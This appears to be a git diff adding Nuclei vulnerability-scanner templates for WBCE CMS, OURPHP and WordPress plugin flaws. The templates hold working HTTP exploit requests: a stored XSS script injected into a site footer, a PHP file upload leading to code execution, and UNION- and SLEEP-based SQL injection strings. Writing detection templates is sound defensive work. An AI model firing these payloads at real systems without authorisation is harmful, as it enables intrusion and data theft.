+ name: WBCE CMS v1.5.4 - Cross Site Scripting (Stored)
+ author: theamanrawat
+ severity: medium
+ description: |
+ A cross-site scripting (XSS) vulnerability in /admin/settings/save.php of WBCE CMS v1.5.4 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Website Footer field.
+ reference:
+ - https://github.com/WBCE/WBCE_CMS
+ - https://shimo.im/docs/Ee32MrJd80iEwyA2/read
+ - https://nvd.nist.gov/vuln/detail/CVE-2022-45038
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
+ cvss-score: 5.4
+ cve-id: CVE-2022-45038
+ cwe-id: CWE-79
+ metadata:
+ verified: "true"
+ tags: cve,cve2022,xss,wbce,cms,authenticated
+
+http:
+ - raw:
+ - |
+ GET /admin/login/index.php HTTP/1.1
+ Host: {{Hostname}}
+
+ - |
+ POST /admin/login/index.php HTTP/1.1
+ Host: {{Hostname}}
+ Content-Type: application/x-www-form-urlencoded
+
+ url=&username_fieldname={{username_fieldname}}&password_fieldname={{password_fieldname}}&{{username_fieldname}}={{username}}&{{password_fieldname}}={{password}}&submit=Login
+
+ - |
+ GET /admin/settings/ HTTP/1.1
+ Host: {{Hostname}}
+
+ - |
+ POST /admin/settings/save.php HTTP/1.1
+ Host: {{Hostname}}
+ Content-Type: application/x-www-form-urlencoded
+
+ advanced=no&formtoken={{formtoken}}&website_footer=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&page_trash=inline&home_folders=true&intro_page=false&frontend_login=false&frontend_signup=false&submit=&default_language=EN&default_timezone=0&default_date_format=d.m.Y&default_time_format=H%3Ai&default_template=wbcezon&default_theme=wbce_flat_theme&search=public&search_template=&page_spacer=-&app_name={{app_name}}&sec_anchor=wbce_&wbmailer_default_sendername=WBCE+CMS+Mailer&wbmailer_routine=phpmail&wbmailer_smtp_host=&wbmailer_smtp_port=&wbmailer_smtp_secure=&wbmailer_smtp_username=&wbmailer_smtp_password=
+
+ - |
+ GET /search/index.php HTTP/1.1
+ Host: {{Hostname}}
+
+ cookie-reuse: true
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: body
+ words:
+ - ""
+ - "Results For"
+ condition: and
+
+ - type: word
+ part: header
+ words:
+ - "text/html"
+
+ - type: status
+ status:
+ - 200
+
+ extractors:
+ - type: regex
+ name: username_fieldname
+ part: body
+ group: 1
+ regex:
+ - 'name="username_fieldname" value="(.*)"'
+ internal: true
+
+ - type: regex
+ name: password_fieldname
+ part: body
+ group: 1
+ regex:
+ - 'name="password_fieldname" value="(.*)"'
+ internal: true
+
+ - type: regex
+ name: formtoken
+ part: body
+ group: 1
+ regex:
+ - 'name="formtoken" value="(.*)"'
+ internal: true
+
+ - type: regex
+ name: app_name
+ part: body
+ group: 1
+ regex:
+ - 'name="app_name" value="(.*?)"'
+ internal: true
diff --git a/http/cves/2022/CVE-2022-46020.yaml b/http/cves/2022/CVE-2022-46020.yaml
new file mode 100644
index 0000000000..46bdcc2c61
--- /dev/null
+++ b/http/cves/2022/CVE-2022-46020.yaml
@@ -0,0 +1,131 @@
+id: CVE-2022-46020
+
+info:
+ name: WBCE CMS v1.5.4 - Remote Code Execution
+ author: theamanrawat
+ severity: critical
+ description: |
+ WBCE CMS v1.5.4 can implement getshell by modifying the upload file type.
+ reference:
+ - https://github.com/WBCE/WBCE_CMS
+ - https://github.com/10vexh/Vulnerability/blob/main/WBCE%20CMS%20v1.5.4%20getshell.pdf
+ - https://nvd.nist.gov/vuln/detail/CVE-2022-46020
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+ cvss-score: 9.8
+ cve-id: CVE-2022-46020
+ cwe-id: CWE-434
+ metadata:
+ verified: "true"
+ tags: cve,cve2022,rce,wbce,cms,authenticated
+
+http:
+ - raw:
+ - |
+ GET /admin/login/index.php HTTP/1.1
+ Host: {{Hostname}}
+
+ - |
+ POST /admin/login/index.php HTTP/1.1
+ Host: {{Hostname}}
+ Content-Type: application/x-www-form-urlencoded
+
+ url=&username_fieldname={{username_fieldname}}&password_fieldname={{password_fieldname}}&{{username_fieldname}}={{username}}&{{password_fieldname}}={{password}}&submit=Login
+
+ - |
+ GET /admin/settings/index.php?advanced=yes HTTP/1.1
+ Host: {{Hostname}}
+
+ - |
+ POST /admin/settings/save.php HTTP/1.1
+ Host: {{Hostname}}
+ Content-Type: application/x-www-form-urlencoded
+
+ advanced=yes&formtoken={{formtoken}}&website_title=test&website_description=&website_keywords=&website_header=&website_footer=&page_level_limit=4&page_trash=inline&page_languages=false&multiple_menus=true&home_folders=true&manage_sections=true§ion_blocks=true&intro_page=false&homepage_redirection=false&smart_login=true&frontend_login=false&redirect_timer=1500&frontend_signup=false&er_level=E0&wysiwyg_editor=ckeditor&default_language=EN&default_charset=utf-8&default_timezone=0&default_date_format=d.m.Y&default_time_format=H%3Ai&default_template=wbcezon&default_theme=wbce_flat_theme&search=public&search_template=&search_footer=&search_max_excerpt=15&search_time_limit=0&page_spacer=-&app_name={{app_name}}&sec_anchor=wbce_&pages_directory=%2Fpages&media_directory=%2Fmedia&page_extension=.php&rename_files_on_upload=
+
+ - |
+ POST /modules/elfinder/ef/php/connector.wbce.php HTTP/1.1
+ Host: {{Hostname}}
+ Content-Type: multipart/form-data; boundary=---------------------------213974337328367932543216511988
+
+ -----------------------------213974337328367932543216511988
+ Content-Disposition: form-data; name="reqid"
+
+ test
+ -----------------------------213974337328367932543216511988
+ Content-Disposition: form-data; name="cmd"
+
+ upload
+ -----------------------------213974337328367932543216511988
+ Content-Disposition: form-data; name="target"
+
+ l1_Lw
+ -----------------------------213974337328367932543216511988
+ Content-Disposition: form-data; name="upload[]"; filename="{{randstr}}.php"
+ Content-Type: application/x-php
+
+
+
+ -----------------------------213974337328367932543216511988
+ Content-Disposition: form-data; name="mtime[]"
+
+ test
+ -----------------------------213974337328367932543216511988--
+
+ - |
+ GET /media/{{randstr}}.php HTTP/1.1
+ Host: {{Hostname}}
+
+ cookie-reuse: true
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: body_6
+ words:
+ - "751a8ba516522786d551075a092a7a84"
+
+ - type: word
+ part: header
+ words:
+ - "text/html"
+
+ - type: status
+ status:
+ - 200
+
+ extractors:
+ - type: regex
+ name: username_fieldname
+ part: body
+ group: 1
+ regex:
+ - 'name="username_fieldname" value="(.*)"'
+ internal: true
+
+ - type: regex
+ name: password_fieldname
+ part: body
+ group: 1
+ regex:
+ - 'name="password_fieldname" value="(.*)"'
+ internal: true
+
+ - type: regex
+ name: formtoken
+ part: body
+ group: 1
+ regex:
+ - 'name="formtoken" value="(.*)"'
+ internal: true
+
+ - type: regex
+ name: app_name
+ part: body
+ group: 1
+ regex:
+ - 'name="app_name" value="(.*)"'
+ internal: true
diff --git a/http/cves/2023/CVE-2023-1020.yaml b/http/cves/2023/CVE-2023-1020.yaml
new file mode 100644
index 0000000000..687d510dd4
--- /dev/null
+++ b/http/cves/2023/CVE-2023-1020.yaml
@@ -0,0 +1,47 @@
+id: CVE-2023-1020
+
+info:
+ name: Steveas WP Live Chat Shoutbox <= 1.4.2 - SQL Injection
+ author: theamanrawat
+ severity: critical
+ description: |
+ The Steveas WP Live Chat Shoutbox WordPress plugin through 1.4.2 does not sanitise and escape a parameter before using it in a SQL statement via an AJAX action available to unauthenticated users, leading to a SQL injection.
+ reference:
+ - https://wpscan.com/vulnerability/4e5aa9a3-65a0-47d6-bc26-a2fb6cb073ff
+ - https://wordpress.org/plugins/wp-shoutbox-live-chat/
+ - https://nvd.nist.gov/vuln/detail/CVE-2023-1020
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+ cvss-score: 9.8
+ cve-id: CVE-2023-1020
+ cwe-id: CWE-89
+ metadata:
+ verified: "true"
+ tags: cve,cve2023,sqli,wordpress,wp-plugin,wp,wp-shoutbox-live-chat
+
+http:
+ - raw:
+ - |
+ POST /wp-admin/admin-ajax.php HTTP/1.1
+ Host: {{Hostname}}
+ Content-Type: application/x-www-form-urlencoded; charset=UTF-8
+
+ action=shoutbox-ajax-update-messages&last_timestamp=0)+UNION+ALL+SELECT+NULL,NULL,(SELECT+CONCAT(0x6338633630353939396633643833353264376262373932636633666462323562)),NULL,NULL,NULL,NULL,NULL--+&rooms%5B%5D=default
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: body
+ words:
+ - "c8c605999f3d8352d7bb792cf3fdb25b"
+ - "no_participation"
+ condition: and
+
+ - type: word
+ part: header
+ words:
+ - "application/json"
+
+ - type: status
+ status:
+ - 200
diff --git a/http/cves/2023/CVE-2023-30210.yaml b/http/cves/2023/CVE-2023-30210.yaml
new file mode 100644
index 0000000000..fc9652304d
--- /dev/null
+++ b/http/cves/2023/CVE-2023-30210.yaml
@@ -0,0 +1,39 @@
+id: CVE-2023-30210
+
+info:
+ name: OURPHP <= 7.2.0 - Cross Site Scripting
+ author: theamanrawat
+ severity: medium
+ description: |
+ OURPHP <= 7.2.0 is vulnerable to Cross Site Scripting (XSS) via /client/manage/ourphp_tz.php.
+ reference:
+ - https://www.ourphp.net/
+ - https://wanheiqiyihu.top/2023/03/27/OURPHP-v7-2-0-ourphp-tz-php-Reflection-xss/
+ - https://nvd.nist.gov/vuln/detail/CVE-2023-30210
+ metadata:
+ verified: "true"
+ tags: cve,cve2023,xss,ourphp,unauthenticated
+
+http:
+ - method: GET
+ path:
+ - "{{BaseURL}}/client/manage/ourphp_tz.php?act=rt&callback="
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: body
+ words:
+ - ""
+ - "barmemCachedPercent"
+ - "swapPercent"
+ condition: and
+
+ - type: word
+ part: header
+ words:
+ - "text/html"
+
+ - type: status
+ status:
+ - 200
diff --git a/http/cves/2023/CVE-2023-30212.yaml b/http/cves/2023/CVE-2023-30212.yaml
new file mode 100644
index 0000000000..29e6cf6214
--- /dev/null
+++ b/http/cves/2023/CVE-2023-30212.yaml
@@ -0,0 +1,38 @@
+id: CVE-2023-30212
+
+info:
+ name: OURPHP <= 7.2.0 - Cross Site Scripting
+ author: theamanrawat
+ severity: medium
+ description: |
+ OURPHP <= 7.2.0 is vulnerale to Cross Site Scripting (XSS) via /client/manage/ourphp_out.php.
+ reference:
+ - https://www.ourphp.net/
+ - https://wanheiqiyihu.top/2023/03/27/OURPHP-v7-2-0-ourphp-out-php-Reflection-xss/
+ - https://nvd.nist.gov/vuln/detail/CVE-2023-30212
+ classification:
+ cve-id: CVE-2023-30212
+ metadata:
+ verified: "true"
+ tags: cve,cve2023,xss,ourphp
+
+http:
+ - method: GET
+ path:
+ - "{{BaseURL}}/client/manage/ourphp_out.php?ourphp_admin=logout&out="
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: body
+ words:
+ - "location.href='../..'"
+
+ - type: word
+ part: header
+ words:
+ - "text/html"
+
+ - type: status
+ status:
+ - 200
diff --git a/http/vulnerabilities/wordpress/advanced-booking-calendar-sqli.yaml b/http/vulnerabilities/wordpress/advanced-booking-calendar-sqli.yaml
new file mode 100644
index 0000000000..ca7981dbda
--- /dev/null
+++ b/http/vulnerabilities/wordpress/advanced-booking-calendar-sqli.yaml
@@ -0,0 +1,34 @@
+id: advanced-booking-calendar-sqli
+
+info:
+ name: Advanced Booking Calendar < 1.6.2 - SQL Injection
+ author: theamanrawat
+ severity: critical
+ description: |
+ The AJAX action abc_booking_getBookingResult, available to both authenticated and Unauthenticated users did not sanitise the calendarId parameter which was then concatenated to a SQL statement, leading an unauthenticated SQL injection issue. This could be used to retrieve information from the database, such as users' hashed password, username and email address.
+ remediation: Fixed in version 1.6.2
+ reference:
+ - https://wpscan.com/vulnerability/bac7b590-70de-45b3-bdc2-19f90524ca39
+ - https://wordpress.org/plugins/advanced-booking-calendar/
+ metadata:
+ verified: "true"
+ tags: sqli,wpscan,wordpress,wp-plugin,wp,advanced-booking-calendar,unauthenticated
+
+http:
+ - raw:
+ - |
+ @timeout: 10s
+ POST /wp-admin/admin-ajax.php HTTP/1.1
+ Host: {{Hostname}}
+ Content-Type: application/x-www-form-urlencoded; charset=UTF-8
+
+ calendarId=1)+AND+(SELECT+2065+FROM+(SELECT(SLEEP(6)))jtGw)+AND+(5440=5440&from=2010-05-05&to=2010-05-09&action=abc_booking_getBookingResult
+
+ matchers:
+ - type: dsl
+ dsl:
+ - 'duration>=6'
+ - 'status_code == 200'
+ - 'contains(content_type, "text/html")'
+ - 'contains(body, "abc-result-header")'
+ condition: and
diff --git a/http/vulnerabilities/wordpress/wp-autosuggest-sql-injection.yaml b/http/vulnerabilities/wordpress/wp-autosuggest-sql-injection.yaml
new file mode 100644
index 0000000000..694413d2b4
--- /dev/null
+++ b/http/vulnerabilities/wordpress/wp-autosuggest-sql-injection.yaml
@@ -0,0 +1,28 @@
+id: wp-autosuggest-sql-injection
+
+info:
+ name: WP AutoSuggest 0.24 - SQL Injection
+ author: theamanrawat
+ severity: critical
+ description: |
+ The wp-autosuggest WordPress plugin was affected by an Unauthenticated SQL Injection security vulnerability.
+ reference:
+ - https://wpscan.com/vulnerability/9188
+ - https://wordpress.org/plugins/wp-autosuggest/
+ metadata:
+ verified: "true"
+ tags: sqli,wordpress,wp-plugin,wp,wp-autosuggest
+
+http:
+ - method: GET
+ path:
+ - "{{BaseURL}}/wp-content/plugins/wp-autosuggest/autosuggest.php?wpas_action=query&wpas_keys=1%27%29%2F%2A%2A%2FAND%2F%2A%2A%2F%28SELECT%2F%2A%2A%2F5202%2F%2A%2A%2FFROM%2F%2A%2A%2F%28SELECT%28SLEEP%286%29%29%29yRVR%29%2F%2A%2A%2FAND%2F%2A%2A%2F%28%27dwQZ%27%2F%2A%2A%2FLIKE%2F%2A%2A%2F%27dwQZ"
+
+ matchers:
+ - type: dsl
+ dsl:
+ - 'duration>=6'
+ - 'status_code == 200'
+ - 'contains(content_type, "text/xml")'
+ - 'contains(body, "")'
+ condition: and